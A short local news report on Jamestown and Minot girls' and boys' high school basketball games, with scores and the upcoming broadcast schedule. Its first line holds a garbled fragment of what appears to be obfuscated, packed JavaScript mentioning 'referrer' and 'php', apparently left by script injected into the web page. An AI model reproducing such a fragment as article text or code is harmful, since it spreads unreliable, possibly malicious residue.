JAMESTOWN dbbtn|var|u0026u|referrer|ynryf||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- The Jamestown girls basketball was looking to put some distance between the top-3 teams in the WDA and the rest of the back. With a win Saturday over Minot the Jays would have had a four game lead on the No. 3-seed in the west.

With 15 minutes left in the game the Jays opened their lead to 16 and it appeared they were on there way to a season sweep of Minot. Loni Bryantt had other ideas as she scored 11 points in a row and finished with a game-high 23 to lead the comeback. The Magi took a 60-55 advantage late in the game and held on to win 64-60.

On the boys side, it was all Minot in the second half as they outscored the Jays 54-17 to roll, 86-38. Jamestown was within eight right before an Austin Frank three-pointer sent Minot into the break up 11. The Magi opened the half on a 22-1 run and never looked back.

The teams will play in Mandan this week, the boys on Tuesday and the girls on Thursday. Both games start at 7:30 and will be broadcast on 1400 KQDJ.
